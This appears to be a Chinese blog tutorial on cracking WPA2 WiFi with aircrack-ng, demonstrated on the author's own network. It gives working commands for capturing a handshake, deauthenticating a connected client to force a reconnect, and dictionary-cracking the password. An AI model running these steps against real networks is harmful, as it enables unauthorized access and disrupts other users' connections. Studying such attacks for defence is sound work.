笔记本有内置的网卡,也可以接外置,这里我用内置网卡做演示写这篇博客
一、检查网卡
使用 airmon-ng 来检测一下网卡是否可用
这里 wlan0 是我的笔记本内置网卡,wlan1 是外置网卡,用不到,不接也可以
二、开启网卡的监听模式
使用 airmon-ng start wlan0 开启网卡的监听模式
开启监听模式后 wlan0 会变成 wlan0mon
再使用 airmon-ng 可以看到
三、扫描环境中的 WiFi
使用 airodump-ng wlan0mon 扫描环境中的 WiFi
这个会一直进行扫描,直到看到有很多扫描到的 WiFi,然后按 Ctrl+c 停止即可
下面我为了方便演示,就破解一个自己的 WiFi,也就是最后那个 weiweinb,记录下要破解 WiFi 的 BSSID 和 CH(信道),也就是 00:90:4C:10:FF:2A 和 11
四、抓取握手包
使用 airodump-ng -c [CH] --bssid [BSSID] -w [抓取的数据包保存的目录] wlan0mon
在这里我应该是使用 airodump-ng -c 11 --bssid 00:90:4C:10:FF:2A -w hack wlan0mon
然后就是显示这个 WiFi 的信息和连接这个 WiFi 的用户
有用户重新连接到这个 WiFi 时,就会获取到数据包,成功抓取到数据包第一行时间右边会有提示
同时在我们的文件里也有了抓到的数据包这些文件,hack-02 就是,hack-01 是之前的,如果没有抓到数据包也是会有文件,但是文件不可以使用
那么问题就来了,谁闲的没事会重新连接方便让你抓包呢。。。
对于抓不到包的 WiFi,可以先把连接他的用户打掉,然后他就会重新连接上来,然后就可以抓到包了
使用 aireplay-ng -0 [发送的数据包数量] -a [BSSID] -c [STATION] wlan0mon
说白了就是疯狂像连接这个 WiFi 的指定用户发送数据包,使他掉线(应该是这样)
我这里应该使用 aireplay-ng -0 10 -a 00:90:4C:10:FF:2A -c B8:37:65:D9:7E:11 wlan0mon
如果 10 条不够就加多点即可
然后就是进行破解了,也就是跑字典
五、破解(跑包)
使用 aircrack-ng -a2 -b [BSSID] -w [字典文件] [抓到的数据包]
kali系统是自带一些字典的,在 /usr/share/dirbuster/wordlists 目录下,可以直接拿来用
在这里我自己找了一个比较常用的简单的字典
使用 aircrack-ng -a2 -b 00:90:4C:10:FF:2A -w ./桌面/aiHuanying/普通默认常用字典.txt hack-02.cap
因为密码比较简单,也是不到一秒就破解出来了,我这里也只是教个方法,字典里没有的话跑死也跑不出来。。。
其他命令
查看所有网卡状态 ifconfig
关闭网卡监听模式 airmon-ng stop wlan0mon
提醒:私自破解他人 WiFi 属于违法行为,该教程只用于学习交流,出现任何问题后果自负与作者无关
4102
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
